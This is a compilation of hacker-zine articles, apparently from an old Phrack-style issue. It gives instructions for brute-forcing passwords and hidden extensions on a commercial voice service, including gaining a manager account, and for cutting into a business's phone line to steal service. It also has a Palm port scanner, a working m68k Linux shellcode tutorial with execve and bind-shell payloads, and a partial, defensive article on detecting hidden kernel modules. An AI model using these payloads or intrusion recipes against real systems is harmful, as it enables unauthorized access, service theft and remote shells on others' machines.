+|=-----------------------------------------------------------------------=|
+|=-=[ 2 - How to hack into Tellme ]=-------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+How to get into the Tell-Me network.
+(1-800-555-tell)
+
+    This is a representation of someone's thoughts. Thoughts cannot be
+owned by another person. Use this thought as you see fit, it is yours to
+duplicate or use as you please.
+
+By Archangel (Formerly of the P.H.I.R.M.)
+Archangel Systems 
+http://the.feds.are.lookingat.us
+--------------------------------------
+
+
+What is the Tell-Me system?
+===========================
+
+    TellMe is a high-tech voice activated phone site with internet
+connectivity, and even a voice activated browser. It is the ultimate goal
+of TellMe to have the whole of the internet voice activated. The system is
+quite sophisticated by today's standards, though I'm sure that tomorrow's
+readers will find the efforts to be quite primative to say the least. A
+free phone call gives the listener access to news, sports, weather, etc.
+Even movie listings. Other areas provide for private announcements, or even
+voice activated web-sites. In other words, it is now possible, through
+TellMe, to dial a phone number, and listen to a website. 
+
+    Tell me is a subsidiary of CNET, a giant (at the time of this writing)
+on the internet.
+
+What security flaws were exploited?
+===================================
+
+    Well, I guess it's nut-cutting time. TellMe has a VERY SERIOUS security
+flaw which can allow unauthorized access to the system within a matter of
+hours. As I tried to hack into my own account, I realized that TellMenu
+announcements only have a 4 digit numeric password.
+
+Here's what you do:
+- You dial 1-800-555-tell.
+- You will get an automated banner-ad followed by a menu discribing
+  various TellMe features.
+- You must say the word "Announcements", or dial "198" on the keypad.
+  This will take you to the announcements area.
+- Once in the announcements area, you will need to punch in the
+  announcement number, which is a seven digit number assigned to you by the
+  TellMe computer.
+- Type in any announcement number you wish (I tried with my own one first,
+  as this was an experiment to see if I could hack in and change my own
+  announcement).
+  The computer says "Ok, here is your announcement."
+  Then I heard a recording of The Baron Telling what a whimp I am.
+- This was followed by the computer saying:
+  Please type in another announcement number, or say "Main Menu" to
+  continue. If you are the announcement manager, please use you telephone
+  keypad to enter your password to edit the announcement. If you remain
+  silent, the computer will say: "Please enter your 4 digit password."
+
+FOUR DIGITS?????
+Were they serious?
+
+Now here's the kicker:
+TELLME WON'T DISCONNECT YOU IF YOU FAIL 3 TIMES IN A ROW!!!
+Yes, ladies and gentlement, keep trying to your heart's content.
+No penalties.
+
+Obviously a Brute Force hack was in order. I handled it by dusting off a
+*VERY* old wardialer.
+
+    I sat on an extention line, due to the limitations of the dialer, and
+listened to it punching in access codes. When it succeeded, I could pause
+the wardialer program. I would be able to look at the screen, and see what
+the last couple of attempted numbers were, manually dial them in, and gain
+access. I know there are easier methods, but this is what I did.
+
+    The Baron had mercifully chosen a low number, and I was in, changing
+the message in about ten minutes. I then tried two other *SAFE* messages,
+that I would not get in trouble for, if changed. I gained access,
+respectively, in 45 and 90 minutes (More or less). My math told me that the
+maximum time to Brute Force a TellMe announcement was about three hours.
+
+Is that it?
+No, while having the ability to change any announcement may be a lot of
+fun, there is a far more intersting hack that you can do on TellMe.
+Remember how when you first sign on, you have to say "announcements"?
+Try saying the word "Extensions". You may be quite surprised at what you
+find.
+
+What are Tell-Me extensions?
+============================
+
+    Tell-Me extensions are that part of the Tellme network, which they
+have offered to the world to produce the voice activated web pages. Here
+is what you do.
+
+- Say "Extensions". You will be taken to the extensions area, and asked to
+  punch in an extension number. This is a five digit number. It was time
+  again for my ancient wardialer to do it's stuff. (Once again, no penalty
+  for incorrect guesses!)
+
+    First off, it is important at this point to mention that TellMe is a
+dying concern. Most of the extensions are empty. The only extensions still
+operating, are some extensions created by individual developers, Die-hard
+developers, and (This is important later) TellMe's *own* extensions.
+
+    Apparently, the idea was to use the extension number as a kind of
+password, as there is no directory, and one must already know the extension
+number in order to gain access.
+
+    I checked into The San Remo hotel here in Las Vegas, under my
+girlfriend's name, and spent the night hacking. Here's what I have come up
+with so far:
+
+Extension 76255:
+----------------
+    This leads to a very bizarre game of Rock/Paper/Scissors. It is one of
+the wierdest things that I have ever come across in all my days. I HIGHLY
+suggest you try it. It is like some whiney hillbilly guy...well see fer
+yerself!
+
+Extension 11111:
+----------------
+    A gypsy with an eight ball. You ask it questions, and it gives you
+answers. There are no disclaimers, so I guess this is the real deal! Saying
+"quit" or "Stop" won't help you. Just shut the hell up, and it will kick
+you back into regular Tell-Me.
+
+Extension 33333:
+----------------
+    Produces the words "HELLO WORLD"
+
+Extension 34118:
+----------------
+    Produces a directory of TellMe's offices, with the regular phone
+numbers.
+
+Most of the worthy extensions consisted of foul language, so anyone
+under 18 should stop reading now...
+
+Use the letters on your telephone keypad, and you will get some very
+intersting results. These are five letter words corresponding to the
+numbers on your phone.
+
+CUNTS - Produces a string of numbers of unknown meaning. Just a long
+        string of a computer voice saying "one, five, seven, three, twelve,
+	eighty-eight" etc. I'll figure out what that means later.
+
+TITTY - This produces a fax tone, as opposed to a computer tone. I didn't
+        mess with it.
+
+PENIS - This produces a verbal message about the sendmail system.
+
+HOLES - This is the Quote of the Day.
+
+BOOBS - This has to do with HTTP protocols.
+
+SHIT0 - This is a directory of phone lines in the TellMe system.
+
+FUCK0 - This is a very interesting directory of phone lines in the TellMe
+        system. Two of the lines appear to be trusted lines, providing a
+	computer tone which I used to log on. There was a first time user
+	option, which gave me a manager's account. (Do they have hundreds
+	of managers?) What can it do? I was able to delete my own account
+	and bring it back. I didn't fuck with anyone elses account. My goal
+	is not to destroy, but to learn.
+
+PISS0 - As above, the TellMe system addresses me with a choice of talking
+        to a live person, or an automated directory of phone lines. I'm
+	amazed this is all behind a five digit password.
+
+Damn0 - Yet another directory of trusted phone lines. This one, however
+        askes you for another password right up front, so I'm assuming this
+	is a more security sensative area!
+
+Pussy - A discription of how to configure a TellMe webpage.
+
+Cum69 - Advice on proper password generation. (hahahahahahahahahaha!!!!)
+
+EATME - Computer tone leading to nowhere.
+
+
+The TellMe security protocols are pathetic.
+
+Archangel (The Teflon Con)
+Wrath of God Hand Delivered
+http://the.feds.are.lookingat.us
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 3 - Shitboxing ]=--------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+by Agent5
+
+    So you're sitting in a small family owned type resturaunt or you're
+walking through a small store looking at their various wares and, as normal
+every couple times a day, you hear the call of nature. You make your way
+towards the (preferably single occupancy) mens room (or ladies for those
+few that may actually read this) and enter.  So your doing your thing and
+you're lookin around checking out your surroundings (why? cause you're
+supposed to be fucking observant at all times.Thats why.) Your gaze takes
+you towards the ceiling. Looks like most most cheap drop down ceilings.
+hmmmm.... drop down ceiling.....easily removable. So you stand on the
+toilet, or whatever, and take a look. You pull out your pocket flashlight
+and take a look. Nothing but wires. Couple elecrical or telephone maybe...
+..TELEPHONE? Does this mean i can sit on the throne and use the fone?
+Indeed it does!  All you need is a few things to help you make your dream
+of phreaking at its absolute lazyest a reality.what you need will (besides
+your beigebox with a RJ-11 plug on the cord) probably cost you, at an
+extreme maximum, 3 bucks for parts and about 6 bucks for an telephone Line
+Crimper for standard telephone plugs (RJ-11) you will also need a... 
+"modular line splitter - Provides two telephone jacks when plugged into the
+end of a telephone line cord. Standard 4-wire jacks. Color: Ivory"----bout
+dollar and change max cost. Most of these parts, if not all, can be found
+at your local radioshack. Now if you havent figured out what i'm getting at
+yet, you should seek medical attention immediately, CAT-scans have helped
+me alot.<twitch>
+
+    Heres what you do and make sure you do it quickly in case they try to
+use the telephone while the line is disconnected. SO make sure you lock the
+door and get to work fast....if you have people beginning to knock on the
+door just make some nasty shitting sounds and say you'll be out in a
+minute.
+
+1. Cut the line. (no specific tools needed, something sharp will do)
+2. Attach a plug to either end of the line you have just cut.
+3. Put one end of the plug in one end of the modular line splitter, put the
+   one thats left into one of the two holes on the front of the splitter.
+4. Now you can either leave and let the intestinaly distressed old guy
+   pouding on the door in, or you can plug your beige box in and have some
+   fun.
+
+    Treat this as you would any other beige boxing session. Keep in mind
+that the people who own the telephone line may want to use it to and may
+not enjoy having someone on the line already. But for the most part this
+ordinary bathroom has just become a your private telephone booth, complete
+with running water and a toilet for the astronomical sum of 3 dollars US.
+
+"This file brought to you by the makers of sharp things."
+
+Shoutouts to Epiphany, Bizurke, Master Slate, Ic0n, Xenocide, Bagel,
+Hopping Goblin, Maddjimbeam, lioid, emerica, the rest of the #mabell
+ninja's, port7 alliance, and LPH crew .
+
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 4 - PalmMap v1.6 - Nmap for Palm ]=--------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+(submitted by Shaun Colley <shaunige at yahoo.co.uk>)
+
+-----BEGIN PALMMAP-----
+# PalmMap.bas
+# PalmMap v1.6 - Nmap for Palm.
+
+fn set_auto_off(0)
+s$(0) = "Host:"
+s$(2) = "Start Port:"
+s$(4) = "End Port:"
+f = form(9, 3, "PalmMap v1.6")
+if f = 0 then end
+if f = 2 then gosub about
+let h$ = s$(1)
+let p = val(s$(3))
+let e = val(s$(5))
+let i = p
+let t$ = "PalmMap.log"
+open new "memo", t$ as #4
+form2:
+cls
+form btn 30 , 40 , 40 , 18, "connect()", 1
+form btn 85 , 40, 40 , 18 , "TCP SYN" , 1
+form btn 60 , 80 , 40 , 18 , "UDP scan" , 1
+form btn 60 , 120, 40 , 18 , "TCP FIN " , 1
+draw "Scan type?", 50, 20, 1
+while
+x = asc(input$(1))
+if x = 14 then gosub scan
+if x = 15 then print "Scan type not implemented as of
+yet."
+if x = 16 then print "Scan type not implemented as of
+yet."
+if x = 17 then print "Scan type not implemented as of
+yet."
+wend
+
+sub scan
+cls
+print at 50, 40
+while(i <= e)
+c = fn tcp(1, h$, i)
+if(c = 0)
+print "Port ", i, "Open"
+fn tcp(-1, "", 0)
+print #4, "Port ", i, "Open"
+else
+fn tcp(-1, "", 0)
+print #4, "Port ", i, "Closed"
+endif
+let i = i + 1
+wend
+close #4
+print "Scan complete!"
+end
+
+sub about
+cls
+msgbox("PalmMap - Nmap for Palm.", "About PalmMap
+1.6")
+-----END PALMMAP-----
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 5 - Writing Linux/mc68xxx Shellcodez ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+ by madcr (madrats@mail.ru)
+
+
+ I    Introdaction.
+ II   Registers.
+ III  Syscalls.
+ IV   Execve shellcode. 
+ V    Bind-socket shellcode.
+ VI   References.
+
+
+ I. Introdaction.
+
+ The history Motorola begins already with 1920 then they let out radioelements 
+ and about computers of nothing it was known. Only in 1974, motorola lets out 
+ the first 8th the bit microprocessor - MC6800, containing 4000 transistors and
+ in 1979 motorola announces the first 16th bit processor - MC68000, capable to 
+ process up to 2 million operations per one second. After 5 more years, in 1984
+ motorola relize the first 32th the bit processor (MC68020), containing 200000 
+ transistors. Till 1994 inclusive motorola improved a series of the processors
+ and in a result, in March, release MC68060 processor contained 2,5 million 
+ transistors. In present days, 68060 is the optimal processor for use any unix.
+
+
+ The processor can work in 2 modes: User and SuperVisor. It not analogy of the 
+ real and protected mode in x86 processors. It some kind of protection
+ "just in case". In the user mode it is impossible to cause exceptions and it 
+ is impossible to have access to all area of memory. In supervisor mode all is
+ accessible. Accordingly kernel work in Supervisor mode, and rest in User mode.
+
+
+ MC68 supported various manufacturers unix, such as netbsd, openbsd, redhat 
+ linux, debian linux, etc. Given article is focused on linux (in particular 
+ debian).
+
+
+ II. Registers.
+
+
+ The processor as a matter of fact the CISC (but there are some opportunities 
+ RISC), accordingly not so is a lot of registers: 
+
+ Eight registers of the data: with %d0 on %d7.
+ Eight registers of the address: with %a0 on %a7. 
+ The register of the status:  %sr. 
+ Two stack indexes: %sp and %fp 
+ The program counter: %pc. 
+
+ Basically it is not required to us of anything more. And the minimal set of 
+ instructions which is required to us by development shellcode:
+
+
+ instruction            example               description
+
+   move                movl %d0,%d1           Put value from %d0 in %d1
+   lea                 leal %sp@(0xc),%a0     calculate the address on 0xc to
+                                              displacement in the stack and it
+ 					      is put in. %a0.
+   eor                 eorl %d0,%d1           xor
+   pea                 pea 0x2f2f7368         push in stack '//sh'
+
+
+
+  In total these 4 instructions will be enough for a spelling functional 
+  shellcode ?). And now it is high time to tell about the fifth, most important
+ instruction (fifth, need us i mean) and about exceptions. The instruction trap
+ - a call of exception. In processors motorola, only 256 exceptions, but of all
+ of them are necessary for us only one - trap #0. In mc68 linux on this 
+ exception call to a kernel, for execution system call. Trap 0 refers to a 
+ vector located to the address $80h (strange concurrence). Now we shall stop on
+ system calls more in detail.
+
+
+ III. System Calls.
+
+
+ System calls on the given architecture are organized thus:  
+
+ %d0 - number of a system call.
+ %d1,%d2,%d3 - argv
+
+ i.e. to make banal setuid (0); we will have something unpretentious: 
+
+ eorl %d2,%d2
+ movl %d2,%d1
+ movl #23,%d0
+ trap #0
+
+ Rather simple.
+
+
+ IV. Execve shellcode.
+
+
+ So, we shall start as always with old-kind execve:
+
+ .globl _start
+_start:
+.text
+	movl #11,%d0       /* execve()  (see unistd.h) */
+	movl #m1,%d1       /* /bin/sh address          */  
+ 	movl #m2,%d2       /* NULL                     */
+	movl #m2,%d3       /* NULL too                 */
+	trap #0
+.data
+m1: .ascii "/bin/sh\0"
+m2: .ascii "0\0".
+
+# as execve.s -o execve.o ; ld execve.o -o execve
+# ./execve
+sh-2.03# exit
+exit
+#
+
+
+ Such code will not go, since he not pozitsio-independent and did not check him
+ on zero. Therefore we shall rewrite him with participation of the stack (since
+ the machine at us big endian the order of following of byte needs to be taken
+ into account):
+
+.globl _start
+_start:
+        moveq #11,%d0         /* execve()            		    */
+	pea 0x2f2f7368        /* //sh                		    */
+ 	pea 0x2f62696e        /* /bin  (big endian)  		    */
+	movel %sp,%d1         /* /bin/sh in %d1      		    */
+	eorl %d2,%d2          /* pea 0x0 + avoiding  		    */
+	movel %d2,%sp@-       /* zero byte           		    */
+ 	pea 0x130             /* pea 0030 -> 0130 = kill the zero   */
+	movel %sp,%d2         /* NULL in %d2                        */
+	movel %d2,%d3         /* NULL in %d2                        */
+	trap #0               /* syscall                            */
+
+# as execve2.s -o execve2.o ; ld execve2.o -o execve2
+# ./execve2
+sh-2.03# exit
+exit
+#
+
+ Very well. Now we shall mutate him in ascii and we shall look as it works:
+
+char execve_shellcode[]=   
+"\x70\x0b"           	      /* moveq #11,%d0               */
+"\x48\x79\x2f\x2f\x73\x68"    /* pea 0x2f2f7368  -> //sh     */
+"\x48\x79\x2f\x62\x69\x6e"    /* pea 0x2f62696e  -> /bin     */
+"\x22\x0f"           	      /* movel %sp,%d1               */
+"\xb5\x82"           	      /* eorl %d2,%d2    ->          */
+"\x2f\x02"           	      /* movel %d2,%sp@- -> pea 0x0  */
+"\x48\x78\x01\x30"            /* pea 0x130                   */
+"\x24\x0f"           	      /* movel %sp,%d2               */
+"\x26\x02"           	      /* movel %d2,%d3               */
+"\x4e\x40";           	      /* trap #0                     */
+
+main()
+{
+ int *ret;
+ ret=(int *)&ret +2;
+ *ret = execve_shellcode;
+}
+
+
+# gcc execve_shellcode.c -o execve_shellcode
+# ./execve_shellcode
+sh-2.03# exit
+exit
+#
+
+
+ Our shellcode. Perfectly. But certainly it is not enough of it, therefore we
+ shall binding this shellcode on socket.
+
+
+
+ V. Bind-socket shellcode. 
+
+
+ For the beginning we write our code on C:
+
+#include <;;shiti;;>
+
+main()
+{
+    int fd,dupa;    
+    struct sockaddr_in se4v;
+
+    fd=socket(AF_INET,SOCK_STREAM,0);
+    se4v.sin_port=200;
+    se4v.sin_family=2;
+    se4v.sin_addr.s_addr=0;
+    
+    bind(fd,(struct sockaddr *)&se4v,sizeof(se4v));
+    listen(fd,1);
+    dupa=accept(fd,0,0);
+    dup2(dupa,0);
+    dup2(dupa,1);
+    dup2(dupa,2);
+    execl("/bin/sh","sh",0);
+}
+
+# gcc -static bindshell.c -o bindshell &
+# ./bindshell &
+[1] 276
+# netstat -an | grep 200
+tcp        0          0    0.0.0.0:200            0.0.0.0:*             LISTEN
+# telnet localhost 200
+Trying 127.0.01...
+Connected to localhost.
+Escape character is '^]'.
+echo aaaaaaaaaaaa
+aaaaaaaaaaaa
+ctrl+c
+[1]+ Done     ./bindshell
+
+
+ All works. Now the last, that us interests - it as there is a work with a 
+ network.
+
+# gdb -q ./bindshell
+(gdb) disas socket
+Dump of assembler code for function socket:
+0x80004734 <socket>:     moveal %d2,%a0
+0x80004736 <socket+2>:   moveq #102,%d0
+0x80004738 <socket+4>:   moveq #1,%d1
+0x8000473a <socket+6>:   lea %sp@(4),%a1
+0x8000473e <socket+10>:  movel %a1,%d2 
+0x80004740 <socket+12>:  trap #0 
+0x80004742 <socket+14>:  movel %a0,%d2
+0x80004744 <socket+16>:  tstl %d0
+0x80004746 <socket+18>:  bmil 0x80004958 <__syscall_error> 
+0x8000474c <socket+24>:  rts 
+0x8000474e <socket+26>:  rts
+End of assembler dump.
+(gdb)
+
+
+ Perfectly. As well as everywhere - 102 = socket_call. 1 - sys_socket. 
+ (for the full list look net.h). Proceeding from the aforesaid we shall write
+ it on the assembler:
+
+.globl _start
+_start:
+
+/* socket(AF_INET,SOCK_STREAM,0); ----------------------------------------- */
+/* af_inet - 2, sock_stream - 1, ip_proto0 - 0 */
+
+        moveq #2,%d0 
+	movl %d0,%sp@        /* sock_stream */ 
+	
+	moveq #1,%d0     
+	movel %d0,%sp@(0x4)   /* AF_INET     */
+		
+	eorl %d0,%d0
+	movl %d0,%sp@(0x8)
+	
+	movl %sp,%d2    /* put in d2 the address in the stack on where our argv*/
+	    	
+	movl #0x66,%d0   /* socketcall (asm/unistd.h) */
+	movl #1,%d1      /* sys_socket (linux/net.h)  */
+	trap #0          /* go on vector 80 */
+
+
+/* -bind(socket,(struct sockaddr *)&serv,sizeof(serv));-------------------- */
+
+  	movl %d0,%sp@          /* in d0 back descriptor on socket */
+                               
+        move #200,%d0
+	movl %d0,%sp@(0xc)     /* port number        */
+	
+	eorl %d0,%d0     
+	movl %d0,%sp@(0x10)    /* sin_addr.s_addr=0  */
+	
+	moveq #2,%d0     
+        movl %d0,%sp@(0x14)    /* sin_family=2       */   
+
+
+/* Let's calculate the address of an arrangement of constants of the     */
+/* second argument and we shall put this address as the second argument  */
+
+        leal %sp@(0xc),%a0   
+        movl %a0,%sp@(0x4)   
+
+	moveq #0x10,%d0
+	movl %d0,%sp@(0x8)    /* third argument 0x10 */
+
+        movl #0x66,%d0        /* socketcall (asm/unistd.h) */
+	movl #2,%d1           /* sys_bind (linux/net.h)    */
+	trap #0               /* go on vector 80           */
+
+
+/* listen (socket,1); ----------------------------------------------------- */
+/* descriptor socket's already in stack.  				    */ 
+/*------------------------------------------------------------------------- */ 
+        moveq #1,%d0
+        movl %d0,%sp@(4)
+
+/* in d2 already put address of the beginning arguments in the stack */
+         	
+	movl #0x66,%d0       /* scoketcall (asm/unistd.h) */
+	movl #4,%d1          /* sys_listen (linux/net.h)  */
+	trap #0              /* go on vector 80           */
+
+/* accept (fd,0,0); ------------------------------------------------------- */
+
+       eorl %d0,%d0
+       movl %d0,%sp@(4)
+       movl %d0,%sp@(8)
+
+
+       movl #0x66,%d0       /* scoketcall (asm/unistd.h) */
+       movl #5,%d1          /* sys_accept (linux/net.h)  */
+       trap #0              /* go on vector 80           */
+	
+/* dup2 (cli,0); ---------------------------------------------------------- */
+/* dup2 (cli,1); ---------------------------------------------------------- */
+/* dup2 (cli,2); ---------------------------------------------------------- */
+
+       movl %d0,%d1
+       movl #0x3f,%d0
+       movl #0,%d2 
+       trap #0
+
+       movl %d0,%d1
+       movl #0x3f,%d0 
+       movl #1,%d2 
+       trap #0
+
+       movl %d0,%d1
+       movl #0x3f,%d0 
+       movl #2,%d2 
+       trap #0
+       
+/* execve ("/bin/sh"); ----------------------------------------------------- */
+      
+      movl #11,%d0       /* execve */
+      pea 0x2f2f7368     /* //sh   */
+      pea 0x2f62696e     /* /bin   */ 
+      movl %sp,%d1       /*  /bin/sh in %d1 */
+
+      eorl %d2,%d2       
+      movl %d2,%sp@-     /* pea 0x0 */ 
+      pea 0x0130         /* 0030 -> 0130 = kill the zero */
+      
+      movl %sp,%d2
+      movl %d2,%d3 
+      trap #0
+
+/* ---EOF---bindsock shellcode--------------------------------------------- */
+
+
+# as bindshell.s -o bindshell.o ; ld bindshell.o -o bindshell
+# ./bindshell &
+[309]
+# telnet localhost 200
+Trying 127.0.01...
+Connected to localhost.
+Escape character is '^]'.
+echo aaaaaaaaaaaa
+aaaaaaaaaaaa
+ctrl+c
+
+ In general and all. The code certainly super-not optimized, is some zero, but
+ the general picture I hope has given. And at last how it should be:
+
+
+char bind_shellcode[]=
+"\x70\x02"           	      /*  moveq #2,%d0          */
+"\x2e\x80"           	      /*  movel %d0,%sp@        */
+"\x70\x01"           	      /*  moveq #1,%d0          */
+"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */ 
+"\xb1\x80"           	      /*  eorl %d0,%d0          */
+"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */ 
+"\x24\x0f"           	      /*  movel %sp,%d2         */
+"\x70\x66"           	      /*  moveq #102,%d0        */
+"\x72\x01"           	      /*  moveq #1,%d1          */
+"\x4e\x40"           	      /*  trap #0               */
+"\x2e\x80"           	      /*  movel %d0,%sp@        */
+"\x30\x3c\x00\xc8"     	      /*  movew #200,%d0        */
+"\x2f\x40\x00\x0c"     	      /*  movel %d0,%sp@(12)    */
+"\xb1\x80"           	      /*  eorl %d0,%d0          */ 
+"\x2f\x40\x00\x10"     	      /*  movel %d0,%sp@(16)    */
+"\x70\x02"           	      /*  moveq #2,%d0          */
+"\x2f\x40\x00\x14"            /*  movel %d0,%sp@(20)    */
+"\x41\xef\x00\x0c"     	      /*  lea %sp@(12),%a0      */
+"\x2f\x48\x00\x04"     	      /*  movel %a0,%sp@(4)     */
+"\x70\x10"           	      /*  moveq #16,%d0         */
+"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */ 
+"\x70\x66"           	      /*  moveq #102,%d0        */ 
+"\x72\x02"           	      /*  moveq #2,%d1          */
+"\x4e\x40"           	      /*  trap #0               */
+"\x70\x01"           	      /*  moveq #1,%d0          */ 
+"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */  
+"\x70\x66"           	      /*  moveq #102,%d0        */
+"\x72\x04"           	      /*  moveq #4,%d1          */
+"\x4e\x40"           	      /*  trap #0               */
+"\xb1\x80"           	      /*  eorl %d0,%d0          */  
+"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */ 
+"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */
+"\x70\x66"           	      /*  moveq #102,%d0        */
+"\x72\x05"           	      /*  moveq #5,%d1          */ 
+"\x4e\x40"           	      /*  trap #0               */
+"\x22\x00"           	      /*  movel %d0,%d1         */
+"\x70\x3f"           	      /*  moveq #63,%d0         */
+"\x74\x00"           	      /*  moveq #0,%d2          */ 
+"\x4e\x40"           	      /*  trap #0               */
+"\x22\x00"           	      /*  movel %d0,%d1         */
+"\x70\x3f"           	      /*  moveq #63,%d0         */
+"\x74\x01"           	      /*  moveq #1,%d2          */
+"\x4e\x40"           	      /*  trap #0               */  
+"\x22\x00"           	      /*  movel %d0,%d1         */
+"\x70\x3f"           	      /*  moveq #63,%d0         */
+"\x74\x02"           	      /*  moveq #2,%d2          */
+"\x4e\x40"           	      /*  trap #0               */
+"\x70\x0b"           	      /*  moveq #11,%d0         */ 
+"\x48\x79\x2f\x2f\x73\x68"    /*  pea 2f2f7368          */
+"\x48\x79\x2f\x62\x69\x6e"    /*  pea 2f62696e          */ 
+"\x22\x0f"           	      /*  movel %sp,%d1         */
+"\xb5\x82"           	      /*  eorl %d2,%d2          */
+"\x2f\x02"           	      /*  movel %d2,%sp@-       */
+"\x48\x78\x01\x30"            /*  pea 130               */
+"\x24\x0f"           	      /*  movel %sp,%d2         */ 
+"\x26\x02"           	      /*  movel %d2,%d3         */ 
+"\x4e\x40";           	      /*  trap #0               */
+
+main()
+{
+ int *ret;
+ ret=(int *)&ret +2;
+ *ret = bind_shellcode;
+}
+
+
+ p.s. as always - sorry for my poor english.
+
+
+ VI. References.
+ 
+ [1] http://e-www.motorola.com/collateral/M68000PRM.pdf  - programmer's manual
+ [2] http://e-www.motorola.com/brdata/PDFDB/docs/MC68060UM.pdf - user's manual
+ [3] http://www.lsd-pl.net/documents/asmcodes-1.0.2.pdf        - good tutorial
+
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 6 - Finding hidden kernel modules (the extrem way) ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+by madsys <madsys at ercist.iscas.ac.cn>
+
+
+1 Introduction
+2 The technique of module hiding
+3 Countermeasure -- brute force
+4 Problem of unmapped
+5 Greetings
+6 References
+7 Code
+
+
+1 Introduction
+==============
+
+This paper presents a method for how to find out the hidden modules in
+linux system. Generaly speaking, most of the attackers intend to hide
+their modules after taking down the victim. They like this way to prevent
+the change of kernel from being detected by the administrator. As modules
+were linked to a singly linked chain, the original one was unable to be
+recovered while some modules have been removed. In this sense, to retrieve
+the hidden modules came up to be hard. Essential C skill and primary
+knowledge of linux kernel are needed.
+
+
+2 The technique of module hiding
+================================
+
+First of all, the most popular and general technique of module hiding 
+and the quomodo of application to get module's list were examined.
+An implement of module hiding was shown as below:
+
+    ----snip----
+    struct module *p;
+    
+    for (p=&__this_module; p->next; p=p->next)
+        {
+            if (strcmp(p->next->name, str))
+                continue;
+            p->next=p->next->next;        // <-- here it 
+removes that module
+                break;
+        }
+    
+    ----snip----
+
+As you can see, in order to hide one module, the unidirectional chain was 
+modified, and following is a snippet of sys_create_module() system call, 
+which might tell why the technique worked:
+
+    ----snip----
+    spin_lock_irqsave(&modlist_lock, flags);
+    mod->next = module_list;
+    module_list = mod;    /* link it in */
+    spin_unlock_irqrestore(&modlist_lock, flags);
+    ----snip----
+
+A conclusion could be made: modules linked to the end of unidirectional 
+chain when they were created.
+
+"lsmod" is an application on linux for listing current loaded modules, 
+which uses sys_query_module() system call to get the listing of loaded 
+modules, and qm_modules() is the actual function called by it while 
+querying modules:
+
+
+static int qm_modules(char *buf, size_t bufsize, size_t *ret)
+{
+    struct module *mod;
+    size_t nmod, space, len;
+
+    nmod = space = 0;
+
+    for (mod=module_list; mod != &kernel_module; mod=mod->next, 
+++nmod) {
+        len = strlen(mod->name)+1;
+        if (len > bufsize)
+            goto calc_space_needed;
+        if (copy_to_user(buf, mod->name, len))
+            return -EFAULT;
+        buf += len;
+        bufsize -= len;
+        space += len;
+    }
+
+    if (put_user(nmod, ret))
+        return -EFAULT;
+    else
+        return 0;
+
+calc_space_needed:
+    space += len;
+    while ((mod = mod->next) != &kernel_module)
+        space += strlen(mod->name)+1;
+
+    if (put_user(space, ret))
+        return -EFAULT;
+    else
+        return -ENOSPC;
+}
+
+    note: pointer module_list is always at the head of the singly linked
+chain. It clearly showing the technique of hiding module was valid.
+
+
+3 Countermeasure -- brute force
+===============================
+
+According to the technique of hiding module, brute force might be useful.
+sys_creat_module() system call was expressed as below. 
+
+    --snip--
+    if ((mod = (struct module *)module_map(size)) == NULL) {
+        error = -ENOMEM;
+        goto err1;
+    }
+    --snip--
+
+    and the macro module_map in "asm/module.h": 
+    #define module_map(x)    vmalloc(x)
+
+
+You should have noticed that the function calls vmalloc() to allocate the
+module struct. So the size limitation of vmalloc zone for brute force is
+able to be exploited to determine what modules in our system on earth.
+As you know, the vmalloc zone is 128M(2.2, 2.4 kernel, there are many
+inanition zones in it), however, any allocated module should be aligned by
+4K. Therefor, the theoretical maximum number we were supposed to detect
+was 128M/4k=32768.
+
+4 Problem of unmapped
+=====================
+
+By far, maybe you think: umm, it's very easy to use brute force to list
+those evil modules". But it is not true because of an important
+reason: it is possible that the address which you are accessing is
+unmapped, thus it can cause a paging fault and the kernel would report:
+"Unable to handle kernel paging request at virtual address".
+
+So we must make sure the address we are accessing is mapped. The solution
+is to verify the validity of the corresponding entry in kernel
+pgd(swapper_pg_dir) and the corresponding entry in page table.Furthermore,
+we were supposed to make sure the content of address pointed by "name"
+pointer(in struct module) was valid. Because the 768~1024 entries of user
+process's pgd were synchronous with kerenl pgd, and that was why such
+hardcore address of kernel pgd (0xc0101000) was used.
+
+
+following is the function for validating those entries in pgd or pgt:
+
+int valid_addr(unsigned long address)
+{
+    unsigned long page;
+
+    if (!address)
+        return 0;
+
+    page = ((unsigned long *)0xc0101000)[address >> 22];        
+//pde
+    if (page & 1)
+    {
+        page &= PAGE_MASK;
+        address &= 0x003ff000;
+        page = ((unsigned long *) __va(page))[address >> 
+PAGE_SHIFT];    //pte
+        if (page)
+            return 1;
+    }
+    
+    return 0;
+}
+
+After validating those addresses which we would check, the next step would
+be easy -- just brute force. As the list of modules including hidden
+modules had been created, you could compare it with the output of "lsmod".
+Then you can find out those evil modules and get rid of them freely.
+
+
+5 Greetings
+===========
+
+Shout to uberhax0rs@linuxforum.net
+
+
+6 Code
+======
+
+-----BEGING MODULE_HUNTER.C-----
+/* 
+ * module_hunter.c: Search for patterns in the kernel address space that
+ * look like module structures. This tools find hidden modules that
+ * unlinked themself from the chained list of loaded modules.
+ *
+ * This tool is currently implemented as a module but can be easily ported
+ * to a userland application (using /dev/kmem).
+ * 
+ * Compile with: gcc -c module_hunter.c -I/usr/src/linux/include
+ * insmod ./module_hunter.o
+ *
+ * usage: cat /proc/showmodules && dmesg
+ */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+
+#ifdef CONFIG_SMP
+#define __SMP__ 
+#endif
+
+#ifdef CONFIG_MODVERSIONS
+#define MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/version.h>
+
+#include <linux/unistd.h>
+#include <linux/string.h>
+
+
+#include <linux/proc_fs.h>
+
+#include <linux/errno.h>
+#include <asm/uaccess.h>
+
+
+#include <asm/pgtable.h>
